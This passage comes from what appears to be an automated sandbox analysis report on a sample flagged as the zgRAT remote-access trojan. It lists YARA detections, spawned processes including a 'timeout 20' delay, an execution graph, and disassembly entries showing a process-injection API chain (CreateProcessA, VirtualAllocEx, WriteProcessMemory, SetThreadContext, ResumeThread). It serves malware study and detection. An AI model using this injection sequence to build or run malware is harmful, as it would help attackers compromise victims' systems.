                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.518753284.000000000302A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:22
                                                                    Start time:10:20:06
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                    Imagebase:0x150000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:23
                                                                    Start time:10:20:06
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7ecfc0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:24
                                                                    Start time:10:20:06
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout 20
                                                                    Imagebase:0x1340000
                                                                    File size:26112 bytes
                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:7.8%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:292
                                                                      Total number of Limit Nodes:19
                                                                      execution_graph 31123 993258 31124 99329d SetThreadContext 31123->31124 31126 9932e5 31124->31126 31127 993108 31128 993148 ResumeThread 31127->31128 31130 993179 31128->31130 31483 d7ac61 31487 d7ac89 31483->31487 31491 d7ac98 31483->31491 31484 d7ac81 31488 d7acbd 31487->31488 31489 d71a80 12 API calls 31488->31489 31490 d7adbc 31489->31490 31490->31484 31493 d7acbd 31491->31493 31492 d71a80 12 API calls 31494 d7adbc 31492->31494 31493->31492 31494->31484 31131 d722c0 31132 d722ce 31131->31132 31135 d75090 31132->31135 31140 d71a80 31135->31140 31138 d72310 31151 d782f9 31140->31151 31143 d75750 31146 d7575a 31143->31146 31215 4a13e91 31143->31215 31222 d75b1d 31143->31222 31226 4a10a58 31143->31226 31231 4a10a48 31143->31231 31236 d75b70 31143->31236 31240 4a13ea0 31143->31240 31146->31138 31154 d783a8 31151->31154 31158 d783da 31154->31158 31162 d783e8 31154->31162 31155 d71a88 31155->31143 31159 d783e8 31158->31159 31166 d7846a 31159->31166 31163 d783f3 31162->31163 31165 d7846a 12 API calls 31163->31165 31164 d78422 31164->31155 31165->31164 31172 d784b0 31166->31172 31177 d78559 31166->31177 31182 d78520 31166->31182 31188 d784a0 31166->31188 31167 d78422 31167->31155 31173 d784bb 31172->31173 31193 4a10d91 31173->31193 31197 4a10da0 31173->31197 31174 d784e6 31174->31167 31200 d78589 31177->31200 31204 d78608 31177->31204 31211 d78598 31177->31211 31178 d7857e 31178->31167 31183 d784cf 31182->31183 31185 d7852f 31182->31185 31184 d784e6 31183->31184 31186 4a10d91 12 API calls 31183->31186 31187 4a10da0 12 API calls 31183->31187 31184->31167 31185->31167 31186->31184 31187->31184 31189 d784bb 31188->31189 31191 4a10d91 12 API calls 31189->31191 31192 4a10da0 12 API calls 31189->31192 31190 d784e6 31190->31167 31191->31190 31192->31190 31194 4a10da0 31193->31194 31195 4a10dbd 31194->31195 31196 d75750 12 API calls 31194->31196 31195->31174 31196->31195 31198 d75750 12 API calls 31197->31198 31199 4a10dbd 31197->31199 31198->31199 31199->31174 31201 d78598 31200->31201 31203 d78608 12 API calls 31201->31203 31202 d785c7 31202->31178 31203->31202 31205 d785b7 31204->31205 31206 d78617 31204->31206 31209 d78608 12 API calls 31205->31209 31208 d78635 31206->31208 31210 d75750 12 API calls 31206->31210 31207 d785c7 31207->31178 31208->31178 31209->31207 31210->31208 31212 d785b7 31211->31212 31214 d78608 12 API calls 31212->31214 31213 d785c7 31213->31178 31214->31213 31216 4a13ea0 31215->31216 31217 4a13f1b 31216->31217 31247 4a1ece2 31216->31247 31251 4a19190 31216->31251 31256 4a1ece8 31216->31256 31260 4a14a88 31216->31260 31217->31146 31223 d75b3d 31222->31223 31224 d75750 12 API calls 31223->31224 31225 d75c18 31223->31225 31224->31225 31225->31146 31229 4a10a69 31226->31229 31227 4a10a81 31227->31146 31228 4a10b94 31228->31146 31229->31227 31433 4a10c30 31229->31433 31234 4a10a69 31231->31234 31232 4a10a81 31232->31146 31233 4a10b94 31233->31146 31234->31232 31235 4a10c30 12 API calls 31234->31235 31235->31233 31237 d75ba0 31236->31237 31238 d75750 12 API calls 31237->31238 31239 d75c18 31237->31239 31238->31239 31239->31146 31241 4a13eb8 31240->31241 31242 4a13f1b 31241->31242 31243 4a1ece2 12 API calls 31241->31243 31244 4a14a88 12 API calls 31241->31244 31245 4a1ece8 12 API calls 31241->31245 31246 4a19190 12 API calls 31241->31246 31242->31146 31243->31242 31244->31242 31245->31242 31246->31242 31248 4a1ece8 31247->31248 31249 4a14a88 12 API calls 31248->31249 31250 4a1ed6e 31249->31250 31250->31217 31252 4a191a8 31251->31252 31265 4a191b1 31251->31265 31271 4a16288 31251->31271 31277 4a191c0 31251->31277 31252->31217 31257 4a1ecf4 31256->31257 31258 4a14a88 12 API calls 31257->31258 31259 4a1ed6e 31258->31259 31259->31217 31261 4a14a99 31260->31261 31262 4a19190 12 API calls 31260->31262 31263 4a16288 12 API calls 31260->31263 31264 4a14a88 12 API calls 31260->31264 31261->31217 31262->31261 31263->31261 31264->31261 31266 4a191e7 31265->31266 31268 4a16288 12 API calls 31266->31268 31269 4a19484 31266->31269 31267 4a197b2 31268->31269 31269->31267 31270 4a14a88 12 API calls 31269->31270 31270->31267 31272 4a162a4 31271->31272 31283 49daafd 31271->31283 31298 4a1650f 31271->31298 31311 4a162b8 31271->31311 31324 4a162a9 31271->31324 31272->31252 31278 4a191e7 31277->31278 31280 4a16288 12 API calls 31278->31280 31281 4a19484 31278->31281 31279 4a197b2 31280->31281 31281->31279 31282 4a14a88 12 API calls 31281->31282 31282->31279 31285 49dab02 31283->31285 31284 49dab74 31284->31272 31285->31284 31287 49dae00 31285->31287 31289 49dae41 31285->31289 31286 49dae70 31286->31272 31337 995ce8 31287->31337 31341 995cde 31287->31341 31289->31286 31290 49daff9 31289->31290 31345 9939d8 31289->31345 31349 9939d0 31289->31349 31291 49db1b3 31290->31291 31353 9933f0 31290->31353 31357 9933e8 31290->31357 31299 4a164f5 31298->31299 31300 49daafd 6 API calls 31299->31300 31304 4a16506 31299->31304 31361 49da822 31299->31361 31366 49da840 31299->31366 31371 49da320 31299->31371 31376 49da306 31299->31376 31381 49db06a 31299->31381 31386 49daec8 31299->31386 31394 49da6b2 31299->31394 31399 49da6d0 31299->31399 31404 49db090 31299->31404 31300->31304 31304->31272 31312 4a162e5 31311->31312 31313 49daafd 6 API calls 31312->31313 31314 4a162f0 31312->31314 31315 49db090 2 API calls 31312->31315 31316 49da6d0 2 API calls 31312->31316 31317 49da6b2 2 API calls 31312->31317 31318 49daec8 4 API calls 31312->31318 31319 49db06a 2 API calls 31312->31319 31320 49da306 2 API calls 31312->31320 31321 49da320 2 API calls 31312->31321 31322 49da840 2 API calls 31312->31322 31323 49da822 2 API calls 31312->31323 31313->31314 31314->31272 31315->31314 31316->31314 31317->31314 31318->31314 31319->31314 31320->31314 31321->31314 31322->31314 31323->31314 31326 4a162b8 31324->31326 31325 4a162f0 31325->31272 31326->31325 31327 49daafd 6 API calls 31326->31327 31328 49db090 2 API calls 31326->31328 31329 49da6d0 2 API calls 31326->31329 31330 49da6b2 2 API calls 31326->31330 31331 49daec8 4 API calls 31326->31331 31332 49db06a 2 API calls 31326->31332 31333 49da306 2 API calls 31326->31333 31334 49da320 2 API calls 31326->31334 31335 49da840 2 API calls 31326->31335 31336 49da822 2 API calls 31326->31336 31327->31325 31328->31325 31329->31325 31330->31325 31331->31325 31332->31325 31333->31325 31334->31325 31335->31325 31336->31325 31340 995d3d K32GetModuleBaseNameA 31337->31340 31339 995dfb 31340->31339 31344 995d3d K32GetModuleBaseNameA 31341->31344 31343 995dfb 31344->31343 31346 993a23 ReadProcessMemory 31345->31346 31348 993a67 31346->31348 31348->31290 31350 993a23 ReadProcessMemory 31349->31350 31352 993a67 31350->31352 31352->31290 31354 993438 WriteProcessMemory 31353->31354 31356 99348f 31354->31356 31356->31291 31358 993438 WriteProcessMemory 31357->31358 31360 99348f 31358->31360 31360->31291 31362 49da869 31361->31362 31363 49da91a 31361->31363 31362->31363 31409 995c1a 31362->31409 31412 995c20 31362->31412 31367 49da869 31366->31367 31368 49da91a 31366->31368 31367->31368 31369 995c1a K32EnumProcessModules 31367->31369 31370 995c20 K32EnumProcessModules 31367->31370 31369->31368 31370->31368 31372 49da55f 31371->31372 31373 49da34e 31371->31373 31373->31372 31415 993598 31373->31415 31419 99358c 31373->31419 31377 49da55f 31376->31377 31378 49da34e 31376->31378 31378->31377 31379 993598 CreateProcessA 31378->31379 31380 99358c CreateProcessA 31378->31380 31379->31377 31380->31377 31383 49db06b 31381->31383 31382 49db1b3 31383->31382 31384 9933e8 WriteProcessMemory 31383->31384 31385 9933f0 WriteProcessMemory 31383->31385 31384->31382 31385->31382 31387 49daff9 31386->31387 31389 49daef5 31386->31389 31388 49db1b3 31387->31388 31392 9933e8 WriteProcessMemory 31387->31392 31393 9933f0 WriteProcessMemory 31387->31393 31389->31387 31390 9939d8 ReadProcessMemory 31389->31390 31391 9939d0 ReadProcessMemory 31389->31391 31390->31387 31391->31387 31392->31388 31393->31388 31395 49da6f9 31394->31395 31396 49da772 31394->31396 31395->31396 31423 9946b8 31395->31423 31428 9946b7 31395->31428 31400 49da772 31399->31400 31401 49da6f9 31399->31401 31401->31400 31402 9946b8 K32EnumProcesses 31401->31402 31403 9946b7 K32EnumProcesses 31401->31403 31402->31400 31403->31400 31405 49db0bd 31404->31405 31406 49db1b3 31404->31406 31405->31406 31407 9933e8 WriteProcessMemory 31405->31407 31408 9933f0 WriteProcessMemory 31405->31408 31407->31406 31408->31406 31410 995c68 K32EnumProcessModules 31409->31410 31411 995ca2 31410->31411 31411->31363 31413 995c68 K32EnumProcessModules 31412->31413 31414 995ca2 31413->31414 31414->31363 31416 993621 CreateProcessA 31415->31416 31418 9937e3 31416->31418 31420 993621 CreateProcessA 31419->31420 31422 9937e3 31420->31422 31424 9946e3 31423->31424 31425 994e73 K32EnumProcesses 31424->31425 31427 994783 31424->31427 31426 994eaa 31425->31426 31426->31396 31427->31396 31429 9946e3 31428->31429 31430 994e73 K32EnumProcesses 31429->31430 31432 994783 31429->31432 31431 994eaa 31430->31431 31431->31396 31432->31396 31434 4a10c61 31433->31434 31435 4a10d22 31434->31435 31439 d7fc18 31434->31439 31449 d7fc28 31434->31449 31435->31228 31436 4a10d18 31436->31228 31440 d7fc28 31439->31440 31441 d7fc3f 31440->31441 31443 d7fc71 31440->31443 31447 d7fc18 12 API calls 31441->31447 31448 d7fc28 12 API calls 31441->31448 31442 d7fc6a 31442->31436 31444 d7fd00 31443->31444 31445 d71a80 12 API calls 31443->31445 31444->31436 31446 d7fec4 31445->31446 31446->31436 31447->31442 31448->31442 31450 d7fc3f 31449->31450 31452 d7fc71 31449->31452 31456 d7fc18 12 API calls 31450->31456 31457 d7fc28 12 API calls 31450->31457 31451 d7fc6a 31451->31436 31453 d7fd00 31452->31453 31454 d71a80 12 API calls 31452->31454 31453->31436 31455 d7fec4 31454->31455 31455->31436 31456->31451 31457->31451 31458 996e00 31461 996e44 EnumChildWindows 31458->31461 31460 996e87 31461->31460 31462 993330 31463 993370 VirtualAllocEx 31462->31463 31465 9933ad 31463->31465 31466 d7f478 31470 d75750 12 API calls 31466->31470 31471 d7f4b0 31466->31471 31477 d7f4a0 31466->31477 31467 d7f499 31470->31467 31472 d7f4d9 31471->31472 31473 d75750 12 API calls 31472->31473 31474 d7f4d0 31473->31474 31475 d7f516 31474->31475 31476 d75750 12 API calls 31474->31476 31476->31475 31478 d7f4d9 31477->31478 31480 d7f4d0 31477->31480 31479 d75750 12 API calls 31478->31479 31479->31480 31481 d7f516 31480->31481 31482 d75750 12 API calls 31480->31482 31482->31481

                                                                      Executed Functions

                                                                      Function 00D70C90 Relevance: .7, Instructions: 721COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 76b5e2d0f14fc8386dca36f3f147983f80563a6ae975518fc866b291f137b0a0
                                                                      • Instruction ID: c2c452a06fd81a3430dbb0b6a57bd04fbfb582427df015bccf58f7e3a4efb51c
                                                                      • Opcode Fuzzy Hash: 76b5e2d0f14fc8386dca36f3f147983f80563a6ae975518fc866b291f137b0a0
                                                                      • Instruction Fuzzy Hash: 14524975A00214DFDB15DFA8C984E98BBB2FF48314F1581A9E509AB366DB31EC81DF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D70730 Relevance: .1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 519f26552aba7ec84e0a996309f2352dd65b9cb4983c2afe695c55801853a5b8
                                                                      • Instruction ID: 78c34d9385793c69956468f8c9613903b3d06a5a61cd57da3b1740def3ef972f
                                                                      • Opcode Fuzzy Hash: 519f26552aba7ec84e0a996309f2352dd65b9cb4983c2afe695c55801853a5b8
                                                                      • Instruction Fuzzy Hash: 34619074E05209DFCB04DFAAC58499EFBF2BF89300F25C56AD815AB265D730A941CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A11590 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15e4c9b393c5811dfefc97b7ffcb798ae4cc8013852536bd4fa94ed45252979b
                                                                      • Instruction ID: 4644f313344517bc3fc04e8cdc34e3f40eba5449f4f0bcbca6e94a6117635882
                                                                      • Opcode Fuzzy Hash: 15e4c9b393c5811dfefc97b7ffcb798ae4cc8013852536bd4fa94ed45252979b
                                                                      • Instruction Fuzzy Hash: F7D0807550100057C380D674DC4BF4AF750DB99321F15C758E439C73D1DA36CA438754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009946B8 Relevance: 2.1, APIs: 1, Instructions: 590COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 9946b8-9946e6 2 994a18-994a28 0->2 3 9946ec-9946fc 0->3 8 994a2e-994a3e 2->8 9 994bf0-994c00 2->9 6 994702-994708 3->6 7 994844-994854 3->7 10 9947aa-9947ac 6->10 11 99470e-994710 6->11 23 9948b9-9948c9 7->23 24 994856-994865 7->24 19 994a60-994a70 8->19 20 994a40-994a5b 8->20 21 994cc3-994cd3 9->21 22 994c06-994c16 9->22 14 9947ae-9947b4 10->14 15 9947c6-994811 10->15 16 99472a-994773 11->16 17 994712-994718 11->17 25 9947b8-9947c4 14->25 26 9947b6 14->26 56 9947db-9947e1 15->56 57 9947f3-994813 15->57 52 99473f-994745 16->52 53 994757-994778 16->53 27 99471a 17->27 28 99471c-994728 17->28 45 994a72-994a81 19->45 46 994ad5-994ae5 19->46 43 994dd6-994ddd 20->43 41 994cd9-994d1c 21->41 42 994de5-994e67 21->42 22->21 44 994c1c-994c32 22->44 23->2 47 9948cf-994912 23->47 48 99487f-9948b4 24->48 49 994867-99486d 24->49 25->15 26->15 27->16 28->16 137 994d39-994d87 41->137 138 994d1e-994d37 41->138 120 994e69-994e71 42->120 121 994e73-994ea8 K32EnumProcesses 42->121 88 994c4c-994c6e 44->88 89 994c34-994c3a 44->89 73 994a9b-994ad0 45->73 74 994a83-994a89 45->74 46->9 69 994aeb-994b2e 46->69 131 994933-994942 47->131 132 994914-99492d 47->132 48->43 54 99486f 49->54 55 994871-99487d 49->55 62 994749-994755 52->62 63 994747 52->63 99 994789-99478c 53->99 100 99476e-99477d 53->100 54->48 55->48 60 9947e3 56->60 61 9947e5-9947f1 56->61 95 99480c-994819 57->95 96 994823-994826 57->96 60->57 61->57 62->53 63->53 150 994b4b-994b99 69->150 151 994b30-994b49 69->151 73->43 82 994a8b 74->82 83 994a8d-994a99 74->83 82->73 83->73 125 994c88-994cbe 88->125 126 994c70-994c76 88->126 97 994c3c 89->97 98 994c3e-994c4a 89->98 113 99481f-994821 95->113 114 994de0 95->114 109 994828-99483f 96->109 97->88 98->88 103 99478e-9947a5 99->103 100->114 116 994783-994787 100->116 103->43 109->43 113->109 114->42 116->103 120->121 127 994eaa-994eb0 121->127 128 994eb1-994ed2 121->128 125->43 134 994c78 126->134 135 994c7a-994c86 126->135 127->128 147 99495c-9949c1 131->147 148 994944-99494a 131->148 132->131 158 9949c6-994a13 132->158 134->125 135->125 137->43 138->137 157 994d89-994dcf 138->157 147->43 155 99494c 148->155 156 99494e-99495a 148->156 150->43 151->150 171 994b9e-994beb 151->171 155->147 156->147 157->43 158->43 171->43
                                                                      APIs
                                                                      • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 00994E9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: EnumProcesses
                                                                      • String ID:
                                                                      • API String ID: 84517404-0
                                                                      • Opcode ID: e4acace08a34fb05567ca03e5551eaf831de5ce7d7df77d23ec1929c9749300c
                                                                      • Instruction ID: 77d590c22fef98e62d7b1b144410df76207efe42e6ce49afba43a8c7e37b888e
                                                                      • Opcode Fuzzy Hash: e4acace08a34fb05567ca03e5551eaf831de5ce7d7df77d23ec1929c9749300c
                                                                      • Instruction Fuzzy Hash: A822C874B041059FCF26EB6CE451ABE77EAEFC9310B24852AD4059B348EF349C429BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0099358C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 193 99358c-99362d 195 99362f-993639 193->195 196 993666-993686 193->196 195->196 197 99363b-99363d 195->197 201 993688-993692 196->201 202 9936bf-9936ee 196->202 199 99363f-993649 197->199 200 993660-993663 197->200 203 99364b 199->203 204 99364d-99365c 199->204 200->196 201->202 206 993694-993696 201->206 212 9936f0-9936fa 202->212 213 993727-9937e1 CreateProcessA 202->213 203->204 204->204 205 99365e 204->205 205->200 207 9936b9-9936bc 206->207 208 993698-9936a2 206->208 207->202 210 9936a4 208->210 211 9936a6-9936b5 208->211 210->211 211->211 215 9936b7 211->215 212->213 214 9936fc-9936fe 212->214 224 9937ea-993870 213->224 225 9937e3-9937e9 213->225 216 993721-993724 214->216 217 993700-99370a 214->217 215->207 216->213 219 99370c 217->219 220 99370e-99371d 217->220 219->220 220->220 221 99371f 220->221 221->216 235 993880-993884 224->235 236 993872-993876 224->236 225->224 238 993894-993898 235->238 239 993886-99388a 235->239 236->235 237 993878 236->237 237->235 241 9938a8-9938ac 238->241 242 99389a-99389e 238->242 239->238 240 99388c 239->240 240->238 244 9938be-9938c5 241->244 245 9938ae-9938b4 241->245 242->241 243 9938a0 242->243 243->241 246 9938dc 244->246 247 9938c7-9938d6 244->247 245->244 249 9938dd 246->249 247->246 249->249
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009937CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 69e6af99a00f665c27f3df330da89eb72dd842f5630b22f39fabb64e9803752f
                                                                      • Instruction ID: 5236a9a733770b282259ef54a7d4c6475030fd39642b397391aeaa94198dbf04
                                                                      • Opcode Fuzzy Hash: 69e6af99a00f665c27f3df330da89eb72dd842f5630b22f39fabb64e9803752f
                                                                      • Instruction Fuzzy Hash: 5BA17C71D04219DFDF20CFA9C881BEDBBB6BF48304F148569E819A7290DB749A85CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00993598 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 250 993598-99362d 252 99362f-993639 250->252 253 993666-993686 250->253 252->253 254 99363b-99363d 252->254 258 993688-993692 253->258 259 9936bf-9936ee 253->259 256 99363f-993649 254->256 257 993660-993663 254->257 260 99364b 256->260 261 99364d-99365c 256->261 257->253 258->259 263 993694-993696 258->263 269 9936f0-9936fa 259->269 270 993727-9937e1 CreateProcessA 259->270 260->261 261->261 262 99365e 261->262 262->257 264 9936b9-9936bc 263->264 265 993698-9936a2 263->265 264->259 267 9936a4 265->267 268 9936a6-9936b5 265->268 267->268 268->268 272 9936b7 268->272 269->270 271 9936fc-9936fe 269->271 281 9937ea-993870 270->281 282 9937e3-9937e9 270->282 273 993721-993724 271->273 274 993700-99370a 271->274 272->264 273->270 276 99370c 274->276 277 99370e-99371d 274->277 276->277 277->277 278 99371f 277->278 278->273 292 993880-993884 281->292 293 993872-993876 281->293 282->281 295 993894-993898 292->295 296 993886-99388a 292->296 293->292 294 993878 293->294 294->292 298 9938a8-9938ac 295->298 299 99389a-99389e 295->299 296->295 297 99388c 296->297 297->295 301 9938be-9938c5 298->301 302 9938ae-9938b4 298->302 299->298 300 9938a0 299->300 300->298 303 9938dc 301->303 304 9938c7-9938d6 301->304 302->301 306 9938dd 303->306 304->303 306->306
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009937CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 703a743605c8df84e3878a83e084966e73833b6c50004bde1a6953cd2d7b0b51
                                                                      • Instruction ID: 792d3e38f03027545a636421c5dff9d6b08a599352e83aca02db3c4700ff6614
                                                                      • Opcode Fuzzy Hash: 703a743605c8df84e3878a83e084966e73833b6c50004bde1a6953cd2d7b0b51
                                                                      • Instruction Fuzzy Hash: 1F917B71D04219DFDF20CFA9C881BEDBBB6BF48304F148569E819A7280DB749A85CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00995CDE Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 307 995cde-995d4b 309 995dba-995df9 K32GetModuleBaseNameA 307->309 310 995d4d-995d72 307->310 311 995dfb-995e01 309->311 312 995e02-995e10 309->312 317 995da2-995da7 310->317 318 995d74-995d76 310->318 311->312 313 995e12-995e1e 312->313 314 995e26-995e4d 312->314 313->314 323 995e5d 314->323 324 995e4f-995e53 314->324 325 995da9-995db5 317->325 321 995d98-995da0 318->321 322 995d78-995d82 318->322 321->325 327 995d84 322->327 328 995d86-995d94 322->328 330 995e5e 323->330 324->323 329 995e55 324->329 325->309 327->328 328->328 331 995d96 328->331 329->323 330->330 331->321
                                                                      APIs
                                                                      • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00995DE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: BaseModuleName
                                                                      • String ID:
                                                                      • API String ID: 595626670-0
                                                                      • Opcode ID: 0a3c401f0112ca94907d60ef2ff36156e43e5adcc209af910f31b8cc39104fd0
                                                                      • Instruction ID: 1a0adcd929e06ee57ff6f5905cc21633b9268df25bd0535a9f35080bd6f1b76f
                                                                      • Opcode Fuzzy Hash: 0a3c401f0112ca94907d60ef2ff36156e43e5adcc209af910f31b8cc39104fd0
                                                                      • Instruction Fuzzy Hash: 5C416370D046489FCF15CFA9D898BDEBBB5BF48314F15842EE81AAB290D3749946CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00995CE8 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 332 995ce8-995d4b 334 995dba-995df9 K32GetModuleBaseNameA 332->334 335 995d4d-995d72 332->335 336 995dfb-995e01 334->336 337 995e02-995e10 334->337 342 995da2-995da7 335->342 343 995d74-995d76 335->343 336->337 338 995e12-995e1e 337->338 339 995e26-995e4d 337->339 338->339 348 995e5d 339->348 349 995e4f-995e53 339->349 350 995da9-995db5 342->350 346 995d98-995da0 343->346 347 995d78-995d82 343->347 346->350 352 995d84 347->352 353 995d86-995d94 347->353 355 995e5e 348->355 349->348 354 995e55 349->354 350->334 352->353 353->353 356 995d96 353->356 354->348 355->355 356->346
                                                                      APIs
                                                                      • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00995DE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405166727.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_990000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID: BaseModuleName
                                                                      • String ID:
                                                                      • API String ID: 595626670-0
                                                                      • Opcode ID: 2e909b980c184050a1066fbc76b9f212e9bbb6907ebe9b44e3603090329a902f
                                                                      • Instruction ID: 90e4d63da62521a8d793de17d9ef23921278ce08ce54ca2a44736f29b2f70613
                                                                      • Opcode Fuzzy Hash: 2e909b980c184050a1066fbc76b9f212e9bbb6907ebe9b44e3603090329a902f
                                                                      • Instruction Fuzzy Hash: 32415470D006489FDF15CFA9C898BDEBBB5BF48314F158429E81AAB390D7749985CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009933F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 367 9933f0-99343e 369 99344e-99348d WriteProcessMemory 367->369 370 993440-99344c 367->370 372 99348f-993495 369->372 373 993496-9934c6 369->373 370->369 372->373
                                                                      APIs
                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 00993480
                                                                      Memory Dump Source
